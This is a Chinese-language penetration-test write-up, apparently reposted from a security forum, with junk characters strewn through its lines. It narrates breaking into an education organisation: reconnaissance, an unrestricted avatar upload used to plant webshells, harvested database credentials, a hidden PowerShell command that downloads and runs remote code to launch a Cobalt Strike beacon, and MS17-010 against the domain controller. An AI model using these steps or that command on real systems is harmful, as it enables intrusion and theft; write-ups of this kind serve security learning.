|
- D. t) y, B" b; X. @3 g$ f
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路; f9 l7 T$ J: e K$ W% G
) l% V3 n6 Y0 X* Z& r
! r+ n; n* w$ L5 P' m. J2 ^
1 G2 |5 e6 E. m: V( B! K1 N $ g; ^) ?7 J) w7 e+ p' ^
2 `* u. [! S) a7 c5 a+ r- \ 正文
/ _2 a# n6 P6 B* }7 n" m% R1 N5 k L# q4 ^! C2 B6 `) D
( c+ ~' J3 r8 y8 M5 Z
, B2 i1 B5 M- q. |( c; E$ } ' G1 I. p( \- w2 S4 c
3 q/ J$ j) e c4 f' x+ q d
目标:www.xxxx.com(一家教育机构)
2 g' l. t7 y: W$ O打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
0 B- M4 e7 ~- t1 o1 {+ y- }
& f+ m" i |; p& Z* ]$ I7 x7 b7 ]; a4 h+ m, C! R
9 l0 P: h3 S' T6 h
0 g& p0 N" Y( d$ ~" }
; m; w" L2 { E q3 r$ U
进行了简单的信息搜集
% p/ j. w9 j+ o2 z) K' v9 { : {5 H3 b/ r$ U! q
6 B9 S) h) ?+ I- J 0 r. Y9 P. e/ f# Q9 j
$ V& F4 Q& _& A8 ?- l8 N! i
子域名搜集1 \' i' N4 ?/ }
/ u* i" g6 b4 w6 X5 ?+ |& }) c+ V% c) o+ X5 c& z
$ G% I8 ?9 j. n9 A {8 i4 D
- w6 F& y4 a+ a/ d1 S6 S6 Z- x1 m( z, \
fofa找资产
% U" y8 K- H% ~/ o0 t
/ o8 O$ o8 G, d. y# ?+ v4 h: ^; e {3 r/ N1 W+ a( V
! q% M6 e$ W1 [4 X! R; M8 \
# o; E" M C" B8 w$ X0 r. _2 s & Y3 O0 X- ?; k
; o- s; K8 t9 \2 h5 T" _
U9 D- c+ u9 E0 Y- I# \! F6 k 一共七个资产。去重之后只有两个。
5 x$ U, D! w8 V3 z4 H / p8 ~: k4 D6 F, C3 V
# a4 x) q% b7 D+ q9 [
4 l7 F) r/ I4 L! o. N" G) l0 ]- G1 B5 ^+ n9 l
目录探测
/ Z! k& }3 a E4 c! W
+ o# \4 ^# G6 k/ D% C- i1 W' X' Q$ \, k; }6 ~9 w5 x1 k
2 B Y4 \* t# B
$ m* w3 B" W$ @& [
6 ^ a1 ~6 K4 |& M; S 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有 * A3 s7 z% R8 l5 [* {
3 Z& }4 z" Q2 O" Z
, l# K5 |3 f8 U9 I# y: \
6 x& o$ m# {# I
: T1 u, |: X0 [& n: j% J
我又尝试了通过修改返回包来绕过登录界面
' r/ {0 j2 g' o# H6 e; n& h: \ * O' n" b+ S0 P' I( H) B6 }- i* n4 w
2 U% U; {+ A& Z" `6 F1 ^
* H. U% a1 Z+ _/ T
" g' i" L5 ^- d" ^! @- `2 w8 s H
4 T2 M% v7 d+ _* g+ v8 B+ R 还是不行,尝试注入无果9 @8 e; g5 r5 W: Z7 J
) H/ m0 A" B8 ~3 D$ X1 b# y. n
/ ~% T d" v s- H 4 Y4 j; @4 z: U
% a2 ]( j6 S B g6 l
3 [) m$ X. [% i- Z% X4 d 不过我目录探测出了一处Spring信息泄露
' H- e; @8 {! Z i3 ?; T) c- [! J; L
* h/ U; Z' l: m4 U% e" s' A' x- \* U: Q3 y) w
# p, y& O) o/ l1 |6 `) u% V( a
7 ? }1 e" ]! J! M2 Q$ b
: s: q( F* L6 T8 d 4 S k- k. |; k. I. E
/ ?. d: c, n7 A+ e 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
: d6 @& x; t5 L5 [4 |! {4 T6 @0 k # i; w; U4 I8 _: Z) ]1 W4 `1 b
% [2 U% q8 q' N9 C# ~ / N; G0 W2 F' N2 T% \3 }# r
# f7 A( w; K7 Z5 v
( v$ j$ F" s& o1 [ 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。; }$ f# ~$ }) ?1 G% N6 n
1 G, C. y \3 S8 ?
4 b8 L" T4 i5 [
' w" e4 m; J7 @7 q A
8 |3 l* R2 P8 g4 ]& X5 q. S# z2 x' d4 I* D8 u' Q+ a
获取有些师傅到这一步就手机抓包电脑测了。
) D% z$ a/ p: _; M8 ~ & t R( R; @" Z$ w8 R
" U& P8 c6 l; z- q; i4 _4 b6 r+ s
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。6 a9 i$ e7 q( W3 U3 L: b) W
+ {* b( W6 @4 x) a0 z9 m1 D% ?' a0 U) a" B. `, Z, g
其中在一个公众号发现了小程序,可以进行注册。$ J( X* k z1 d5 D
. U" x. g% u0 k. @3 A
e. p ~, z$ h. A z, ~ 看到了头像上传,尝试上传获取WebShell1 j4 a" t4 b5 j
* H S9 l- y0 W* P) H
* _9 N& j- L/ W% y 6 J/ o- |- Q! j# L' s
* v( D% }6 c" r- }5 y. V. t
$ r4 |. }9 b$ Q4 `2 [ S; i 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
% G0 t) y5 }: i4 H- s I9 S3 w: `
& G, l. b$ q, a- S0 E2 x8 Y A8 W# q
) f j5 g7 [& t5 \3 f9 ? ' U' Y7 w* P3 I) ]
0 r+ I- X# e+ }+ V4 \
然后上了大马
$ A$ Y/ `, z ?/ G! Q3 @; ? t
8 s1 M' s4 h( p0 W1 M3 E1 Y* s* i
9 N1 Z1 O' |6 p# q: Q/ i$ V) `% t
. N$ K& {/ p% Y. E( p 0 J( v+ h% K' Z2 B% P
* {1 c/ ^: O0 k$ b. Z
5 _9 t6 Z: D" ~5 _/ r, I ! }- m. S2 X$ [) E/ u# r. x/ \
0 C/ V, P3 u* W3 O2 U
通过翻找文件发现数据库账号密码) v- P3 e! p+ D7 m |
8 l/ \, @1 T" Z* `* o
( _( V# I3 q, y& ^; F2 V/ j
9 M; t# c' J7 i! S; o3 I - S: V2 p2 E+ y! ?! ~
) ]8 [2 Y6 X1 T. L |. ~ --内网渗透( J: E2 N8 f; O
& [, ]4 @( g T9 f% \; M9 }
@6 {5 B+ l& `: ^ 直接通过powershell执行 cs上线3 D5 r1 s! Q8 _- q
Z; @% Q5 B# K5 H7 r0 l
, A, T' | f: f# v powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))". M8 ~% Q5 a; y
8 t4 x( n* ]3 Z& c! U2 D( g' x$ U9 I+ y' q. \4 f' Y/ E: ~
- O8 V* {) K0 s5 o. G7 o9 ] ' V. v5 J8 Z; d2 i; t
: P+ B& O+ K/ {: p& K
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
' j. i7 H5 i) n' D6 n& G* E9 T " H$ b Z: q# G
& R) ]! ~* `) e; j
4 [1 r4 y- ?* | & V9 u! W4 W% s [2 a
% W6 H9 R2 }! |; _ s+ u
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
1 U8 {1 Q3 [8 ]# _ + C$ x- q2 ?0 v1 b/ ^
! S0 t) M& i9 m5 P% _: @& F
3 s/ P+ N: o1 M1 @ b
0 {! b4 L+ M* g7 r. S6 m i
* g& n/ l$ I- j3 U$ O2 y
0 R; l2 K" W! a$ x' f) p $ C% ^. M) k1 d9 m7 r. }; k
& Z# ]- P- |( _ 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭 4 p0 h: \1 l/ g- l, F
+ I9 {+ q4 O& ~
m8 x9 R) C1 V: ^6 B
" T8 I3 \8 U1 t i8 n9 S6 x( G! a$ U- L
# M) x2 M- ?6 D' {0 u n
5 E }% m5 @" W% f, U0 O8 Y( f: Y4 M: Y E3 |, [5 P9 K7 J
' } S7 U1 p5 K, ~; ]2 q k5 E
% @ W2 ]" W6 Z8 F* {' h0 `6 @- h# `9 h% [% Y; J
! ]& H$ B- F9 N7 _5 V! _9 I$ q- A
* {$ g. t! m. F V
7 w7 ], O! I- f5 Z9 _3 ?9 Z, `$ g! t
% m& A/ B. ^4 d4 }
* C# g9 J9 n/ U9 v
小结
0 }# {7 E/ r1 x$ V
- u. C0 W6 z4 ~* ?4 o5 x
2 y" f, J9 ?, h9 I" X 8 \4 R( r& Z4 I. c
- i1 k9 n1 A$ P! X4 v6 ]! D
- y" l% P( S0 |' l! p 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!; Q$ e7 h) I4 x' O4 D* k
% _' P7 G# k* d! I' ?- f/ t. J% @/ N0 W/ o+ {
) R. H! V3 ^; F* B6 U+ ` 0 G+ M8 l2 q' f# ~" H8 @$ G
& D0 X9 Q+ D4 B( R4 P+ H7 I
- 1 V3 J P7 `* {
0 k- M; }2 z' d2 k. r
& ^5 {' t; p* j" M8 c5 n2 Z- S
- $ g# B! \2 |. d6 m) s5 s
! P o6 P* J5 Q* T
( ?9 L6 i3 D$ \! _) o
/ L7 b4 p+ p. p- Z
4 J, T6 [ n9 ?$ [' a 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html* S. {' I4 e1 A* u3 T
1 V/ Y* n& p( Y! w; ]6 q
9 Y7 \9 x$ [; x+ H9 O" Y
& Q- u: o, w( P0 e8 U* I# ] z7 ?* F2 x
|